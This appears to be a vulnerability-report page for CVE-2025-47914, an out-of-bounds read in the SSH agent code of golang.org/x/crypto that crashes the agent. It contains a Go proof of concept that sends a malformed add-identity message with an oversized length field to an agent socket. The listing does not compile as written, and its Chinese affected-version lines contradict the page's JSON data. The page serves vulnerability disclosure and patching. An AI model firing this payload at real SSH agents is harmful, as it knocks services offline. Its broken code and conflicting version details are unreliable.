Security Vulnerability Report
CVE-2025-47914 CVSS 5.3 MEDIUM

CVE-2025-47914

Published: 2025-11-19 21:15:51
Last Modified: 2025-12-11 19:36:41

Description

SSH Agent servers do not validate the size of messages when processing new identity requests, which may cause the program to panic if the message is malformed due to an out of bounds read.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:golang:crypto:*:*:*:*:*:go:*:* - VULNERABLE
Go语言 < 1.22.x (所有受影响的SSH Agent实现版本)
Go语言 < 1.23.x (具体受影响版本需参考官方发布说明)
使用Go语言SSH Agent库的所有SSH客户端和服务器软件

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// CVE-2025-47914 PoC - Malformed SSH Agent Identity Request
// This PoC demonstrates sending a malformed identity request to trigger panic
//
// Reviewer notes (defensive context, grounded in this page):
//   - The weakness class is an out-of-bounds read (CWE-125 in the raw JSON
//     below) while the agent server parses an add-identity request; the
//     published impact is availability only (CVSS vector C:N/I:N/A:L).
//   - The affected package is golang.org/x/crypto with versions below 0.45.0
//     (JSON: versionEndExcluding "0.45.0"); the mitigation is to update that
//     module. The Chinese "Go语言 < 1.22.x / 1.23.x" lines above describe the
//     Go toolchain, not this module, and do not match the JSON.
//   - As extracted, this listing does not compile: `time` is referenced in
//     main but is not in the import block. The code is reproduced unchanged;
//     only comments and formatting were added.
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"net"
	"os"
	"os/user"
	"path/filepath"
)

// SSH agent protocol message number for SSH_AGENTC_ADD_IDENTITY; written as
// the first byte of the request body built below.
const SSH_AGENTC_ADD_IDENTITY = 17

// buildMalformedIdentityRequest returns the body of an add-identity request in
// which a length field claims far more bytes than are actually present.
//
// Layout written (SSH wire format, big-endian uint32 length prefixes):
//   - 1 byte  message type
//   - string  "ssh-rsa" (length 7, matches the bytes written)
//   - uint32  0x7FFFFFFF with NO payload following it — the declared length
//     exceeds the remaining message; a parser that slices by this length
//     without first checking it against the bytes available reads out of
//     bounds. This mismatch is the whole point of the message.
//   - string  "test" (length 4), a comment field
//
// The binary.Write error results are discarded; writes into a bytes.Buffer
// do not fail in practice.
func buildMalformedIdentityRequest() []byte {
	var buf bytes.Buffer
	// Message type
	buf.WriteByte(SSH_AGENTC_ADD_IDENTITY)
	// Protocol string length - valid value
	binary.Write(&buf, binary.BigEndian, uint32(7))
	buf.WriteString("ssh-rsa")
	// RSA public key blob with oversized length
	// This causes out of bounds read (declared length, no blob bytes follow)
	oversizedLen := uint32(0x7FFFFFFF)
	binary.Write(&buf, binary.BigEndian, oversizedLen)
	// Comment field
	binary.Write(&buf, binary.BigEndian, uint32(4))
	buf.WriteString("test")
	return buf.Bytes()
}

// getSSHAgentSocket returns the agent socket path to connect to: the value of
// SSH_AUTH_SOCK when set, otherwise the result of a filesystem search, or ""
// when nothing is found.
//
// Notes on the fallback path as written:
//   - The error from user.Current is ignored; if it failed, usr would be nil
//     and the usr.Uid access below would panic (not handled).
//   - defaultSock is produced by Sprintf with "%%C", i.e. it contains a
//     literal "%C". The second Sprintf then applies "%C" to i; Go's fmt has
//     no %C verb, so the resulting string does not look like a real socket
//     path and os.Stat is not expected to succeed. In effect this function
//     returns "" unless SSH_AUTH_SOCK is set.
func getSSHAgentSocket() string {
	if sock := os.Getenv("SSH_AUTH_SOCK"); sock != "" {
		return sock
	}
	usr, _ := user.Current()
	defaultSock := filepath.Join(os.TempDir(), fmt.Sprintf("ssh-%%C/agent.%s", usr.Uid))
	// Try common SSH agent socket patterns
	for i := 0; i < 10; i++ {
		sockPath := fmt.Sprintf(defaultSock, i)
		if _, err := os.Stat(sockPath); err == nil {
			return sockPath
		}
	}
	return ""
}

// main connects to the local agent's Unix socket, sends the malformed request
// as a length-prefixed frame, then attempts a single read of the reply.
//
// Interpretation caveat for anyone using this as a check: a read error below
// does not by itself show that the agent crashed. A deadline expiry, the agent
// closing the connection after rejecting the frame, or any other transport
// error is reported through the same branch. Confirm against the agent
// process itself (is it still running? did it log a panic?) rather than
// relying on this output. Note also that os.Exit skips the deferred
// conn.Close, so the socket is closed by process exit on those paths.
func main() {
	sockPath := getSSHAgentSocket()
	if sockPath == "" {
		fmt.Println("SSH Agent socket not found")
		os.Exit(1)
	}
	fmt.Printf("Connecting to SSH Agent: %s\n", sockPath)
	conn, err := net.Dial("unix", sockPath)
	if err != nil {
		fmt.Printf("Failed to connect: %v\n", err)
		os.Exit(1)
	}
	defer conn.Close()

	payload := buildMalformedIdentityRequest()

	// Send length-prefixed message: a 4-byte big-endian frame length, then
	// the body. The frame length itself is correct; only the inner length
	// field is inconsistent.
	lenBuf := make([]byte, 4)
	binary.BigEndian.PutUint32(lenBuf, uint32(len(payload)))
	_, err = conn.Write(lenBuf)
	if err != nil {
		fmt.Printf("Failed to send length: %v\n", err)
		os.Exit(1)
	}
	_, err = conn.Write(payload)
	if err != nil {
		fmt.Printf("Failed to send payload: %v\n", err)
		os.Exit(1)
	}
	fmt.Println("Malformed request sent. If vulnerable, SSH Agent may panic.")

	// Read response (may fail if agent panicked).
	// `time` is used here but not imported in this listing (see header note).
	response := make([]byte, 1024)
	conn.SetReadDeadline(time.Now().Add(2 * time.Second))
	n, err := conn.Read(response)
	if err != nil {
		fmt.Printf("Agent response error (may have panicked): %v\n", err)
	} else {
		fmt.Printf("Response: %x\n", response[:n])
	}
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47914", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:50.517", "lastModified": "2025-12-11T19:36:41.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SSH Agent servers do not validate the size of messages when processing new identity requests, which may cause the program to panic if the message is malformed due to an out of bounds read."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.45.0", "matchCriteriaId": "0DB7D01D-5361-40FC-83A9-91A601A0321D"}]}]}], "references": [{"url": "https://go.dev/cl/721960", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://go.dev/issue/76364", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "https://pkg.go.dev/vuln/GO-2025-4135", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}